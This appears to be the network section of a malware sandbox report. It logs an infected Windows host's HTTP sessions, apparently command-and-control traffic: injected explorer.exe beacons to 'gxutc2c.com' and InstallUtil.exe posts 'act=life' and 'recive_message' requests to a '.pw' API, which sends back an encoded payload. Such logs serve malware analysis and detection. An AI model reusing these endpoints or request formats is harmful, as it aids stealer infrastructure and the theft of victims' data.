                                                                                                                                                                    Jan 7, 2024 05:30:45.970762968 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:45 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    21192.168.2.449809109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:46.199949980 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ymhxlrbyafkagxbs.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 327
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:46.199949980 CET327OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 79 1d fd a0
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vuy7Seyhv~K2e/c]ov!dP_/B}%*IMD|1-l-WyVm1+6)9'8AMQ|f>%PA
                                                                                                                                                                    Jan 7, 2024 05:30:46.596568108 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:46 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    22192.168.2.449810109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:46.843676090 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ewuooimuofjgrsja.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 319
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:46.843707085 CET319OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 3f 03 f8 bd
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu?Iou;BH)hdDNwK 'B+"+B@zw8j4qY|C~35PS3XfMo+`q|KI,v
                                                                                                                                                                    Jan 7, 2024 05:30:47.187925100 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:47 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    23192.168.2.449811109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:47.426105976 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://mjpupsgsyyvqpl.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 328
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:47.426199913 CET328OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 54 19 e1 ac
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vuTZ5VMJ"Y[qtF%X+LGpYCm{*K1=A\wW)%!LAUHf>px:a%u
                                                                                                                                                                    Jan 7, 2024 05:30:47.822796106 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:47 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    24192.168.2.449812109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:48.073633909 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://samlekvmkgd.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:48.073633909 CET167OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5f 4a b6 9b
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu_JL&cb~L9f8}x^)I9&9`"PNW\;,3'ha
                                                                                                                                                                    Jan 7, 2024 05:30:48.469623089 CET238INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:48 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    25192.168.2.449813109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:48.821219921 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ioueyomybwjluyi.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 268
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:48.821244955 CET268OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 3e 46 b1 fa
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu>FYP@\t]d{Oy/rlU^0C;WPWPB4x v#%J+8q$3"rSwtrQ5Qv
                                                                                                                                                                    Jan 7, 2024 05:30:49.219203949 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:49 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.449738172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:49 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:49 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                    2024-01-07 04:29:49 UTC1337INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:49 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=s2tf2adu1padgco84kkf86rafu; expires=Wed, 01-May-2024 22:16:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:49 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:49 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:49 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a3v2dRgTdbYSIGbSIZ8UQjoqgNXkuK%2FvDESgI0avULJ9LTZ%2FE2bRR%2F5oMAvEMEVaEquQ4Sb655%2FWRwY7KWNBwdQmLqOHxSca8tDzvAhVH6hU81dZ%2BwYtgkxDJRq2NxaKZfYkUUGoJKvL0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 84197640dc3419bb-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:49 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                    2024-01-07 04:29:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.449739172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:50 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 52
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:50 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 6d 4e 73 41 32 2d 2d 67 72 65 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=AmNsA2--gre&j=default
                                                                                                                                                                    2024-01-07 04:29:50 UTC1343INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:50 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=8pkdi2s06qg9fu1edanqgqi5fl; expires=Wed, 01-May-2024 22:16:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:50 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:50 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:50 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xe%2B7tJNOVsuHnckK3Udx4td4D55ProPUdl9uvtV2dVzeMfFP0Jwhi5jKEvx8Y9LcU5F7%2Bch3Cgc5GED%2F14EeSJzA7JjnkApqHRBc1AOVwYlfwybyQVEend4rqtJ%2B%2BR%2BV%2BzVFDu%2F8PpCzRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 841976452957178c-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:50 UTC26INData Raw: 34 33 63 38 0d 0a 67 78 4d 6e 35 2f 35 54 47 6d 75 72 6b 4f 55 41 51 65 6a 36
                                                                                                                                                                    Data Ascii: 43c8gxMn5/5TGmurkOUAQej6
                                                                                                                                                                    2024-01-07 04:29:50 UTC1369INData Raw: 6d 36 50 4d 35 66 48 46 72 75 70 79 41 57 57 75 6a 66 75 67 4e 77 2f 34 48 69 33 48 33 6e 4d 36 53 64 32 79 33 79 42 31 78 50 65 52 67 2b 7a 46 30 65 66 64 6a 31 41 37 52 64 72 2f 6a 73 55 62 41 6f 6b 7a 42 38 66 65 63 58 73 50 69 61 72 46 5a 69 43 45 69 66 36 50 77 65 2f 52 35 59 37 4b 55 47 51 64 6a 4c 66 62 2b 7a 6f 46 6f 7a 4d 48 78 39 35 7a 59 57 61 68 73 4d 55 67 59 63 6a 61 75 34 50 75 67 4a 2f 6e 6c 4d 70 51 5a 41 2f 4d 37 4a 66 43 56 6d 54 73 59 30 75 45 6c 6a 39 39 41 38 37 7a 67 57 45 74 68 5a 2f 2b 78 71 32 50 6e 36 7a 44 67 68 38 6a 53 61 4f 48 32 34 41 58 4c 36 4d 7a 42 38 66 63 4e 6d 42 4a 6b 62 44 48 54 53 53 63 6d 39 62 43 76 34 37 54 79 4b 54 4b 55 69 46 46 6a 71 32 47 6a 44 6f 46 69 6a 4d 48 6e 50 4e 5a 45 32 4b 4a 39 59 73 69 65 38 6a
                                                                                                                                                                    Data Ascii: m6PM5fHFrupyAWWujfugNw/4Hi3H3nM6Sd2y3yB1xPeRg+zF0efdj1A7Rdr/jsUbAokzB8fecXsPiarFZiCEif6Pwe/R5Y7KUGQdjLfb+zoFozMHx95zYWahsMUgYcjau4PugJ/nlMpQZA/M7JfCVmTsY0uElj99A87zgWEthZ/+xq2Pn6zDgh8jSaOH24AXL6MzB8fcNmBJkbDHTSScm9bCv47TyKTKUiFFjq2GjDoFijMHnPNZE2KJ9Ysie8j
